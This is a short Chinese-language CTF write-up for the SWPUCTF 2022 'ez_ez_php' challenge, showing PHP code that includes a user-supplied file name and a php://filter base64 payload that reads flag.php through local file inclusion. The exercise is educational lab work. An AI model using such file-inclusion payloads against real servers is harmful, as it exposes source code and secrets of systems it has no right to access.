[SWPUCTF 2022 新生赛]ez_ez_php

[SWPUCTF 2022 新生赛]ez_ez_php wp

题目代码如下:

复制代码
 <?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

根据代码,GET 传入的参数要以 php 开头,并且提示有一个 flag.php 文件。那就直接用 php 伪协议。

php://filter 伪协议

payload

复制代码
file=php://filter/read=convert.base64-encode/resource=flag.php

返回结果:

base64 解码后得到 flag.php 文件内容:

这里有些乱码,但可以看得出来提示:真正的 flag 在名为 'flag' 的文件里面。

那就用伪协议再读一次:

拿到 flag 。

相关推荐
Z3r4y2 小时前
【代码审计】JeecgBoot-3.5.0 四处安全问题分析
java·web安全·代码审计·jeecg-boot
GZ_TOGOGO2 小时前
网络安全认证考取证书有哪些?
安全·web安全·网络安全·cisp
半生过往4 小时前
前端运行PHP 快速上手 使用 PHPStudy Pro 详细搭建与使用指南
开发语言·前端·php
JM丫4 小时前
buuctf-ciscn_2019_c_1
网络安全·ctf
it运维技术圈4 小时前
印度电信部门发布强制指令:即时通讯应用需绑定活跃 SIM 卡,实施六小时会话登出
网络·安全·web安全
重生之我在番茄自学网安拯救世界4 小时前
网络安全中级阶段学习笔记(一):DVWA靶场安装配置教程与网络空间搜索语法
笔记·学习·网络安全·靶场·dvwa·fofa·google hack
Whoami!5 小时前
❼⁄₅ ⟦ OSCP ⬖ 研记 ⟧ 查找漏洞的公共利用 ➱ 实操案例(下)
网络安全·信息安全·漏洞利用
Xudde.5 小时前
friendly靶机渗透
笔记·学习·安全·web安全·php
三毛人6 小时前
php usdt地址生成
开发语言·php